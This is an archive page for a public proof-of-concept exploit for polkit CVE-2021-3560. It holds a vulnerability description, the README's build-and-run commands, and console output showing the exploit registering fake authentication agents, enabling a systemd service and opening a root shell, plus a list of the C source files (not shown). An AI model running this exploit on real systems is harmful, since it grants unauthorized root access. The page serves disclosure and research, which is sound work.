Related vulnerability
Title:
polkit code issue vulnerability
(CVE-2021-3560)
Description: polkit is a component that controls system-wide privileges in Unix-like operating systems. By defining and auditing permission rules, it mediates communication between processes of different privilege levels. polkit contains a code issue vulnerability: when the requesting process disconnects from dbus-daemon before polkit_system_bus_name_get_creds_sync is called, polkit cannot obtain the process's unique uid and pid and therefore cannot verify the privileges of the requesting process.
Description
PolicyKit CVE-2021-3560 Exploitation (Authentication Agent)
Introduction
PolicyKit CVE-2021-3560 Exploitation (Authentication Agent)
====
C implementation of the CVE-2021-3560 exploitation. Blog posts about this exploitation method:
- https://ricterz.me/posts/2022-04-28-a-new-exploit-method-for-cve-2021-3560-polkit-linux-privilege-escalation.txt
- http://noahblog.360.cn/a-new-exploit-method-for-cve-2021-3560-policykit-linux-privilege-escalation
### Contributors
Code by swing (@WinMin), Ricter Z (@RicterZ)
### Usage
```
dev@server:/tmp/CVE-2021-3560$ make
dev@server:/tmp/CVE-2021-3560$ ./exploit
pid:264181 - [ polkit CVE-2021-3560 exploit ] - RicterZ @ 360 Noah Lab, C writed by Swing @ chaitin
pid:264181 - [*] main process running ...
pid:264183 - [*] starting polkit authentication agent ...
pid:264182 - [*] starting polkit authentication agent ...
pid:264185 - [*] starting polkit authentication agent ...
pid:264183 - [*] trying to register authentication agent to polkit ...
pid:264182 - [*] trying to register authentication agent to polkit ...
pid:264183 - [+] polkit authentication agent registered successfully!
pid:264183 - [+] D-Bus message loop now running ..
pid:264185 - [*] trying to register authentication agent to polkit ...
pid:264182 - [+] polkit authentication agent registered successfully!
pid:264182 - [+] D-Bus message loop now running ..
pid:264185 - [+] polkit authentication agent registered successfully!
pid:264185 - [+] D-Bus message loop now running ..
pid:264183 - [*] trying to enable system unit file '/tmp/pwnkit.service' ...
pid:264182 - [*] trying to start systemd service 'pwnkit.service' ...
pid:264185 - [*] trying to reload systemd daemon ...
pid:264183 - [+] received authentication for action 'org.freedesktop.systemd1.manage-unit-files' ...
pid:264183 - [*] sending agent response with cookie: 61-bf243e2d0039ce513f32553f945c80d7-1-dddae4b0320b4030370585c13b6a9985
pid:264182 - [+] received authentication for action 'org.freedesktop.systemd1.manage-units' ...
pid:264182 - [*] sending agent response with cookie: 62-c23ffa64bf9c05a1ca8bf057d56a9dfd-1-8d220cfb275f861dcfacd340fc5a578a
pid:264185 - [+] received authentication for action 'org.freedesktop.systemd1.reload-daemon' ...
pid:264185 - [*] sending agent response with cookie: 63-3b99bb8ff0b6b3ffcb7e6103fbe86073-1-6d47c6a380691defd9c455eba617513d
pid:264181 - [+] file exists, popping root shell ...
pwned-5.0# id
uid=1000(dev) gid=1000(dev) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),120(lpadmin),131(lxd),132(sambashare),1000(dev)
pwned-5.0#
```
File snapshot
[4.0K] /data/pocs/acff4e2b32d047accd8bacd01e5390a794fa24d4
├── [6.8K] agent.c
├── [ 68] agent.h
├── [4.1K] exploit.c
├── [ 376] Makefile
└── [2.5K] README.md
0 directories, 5 files
Notes
1. It is recommended to access the PoC through its original source first.
2. If the source has become unavailable or cannot be accessed, send an e-mail to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.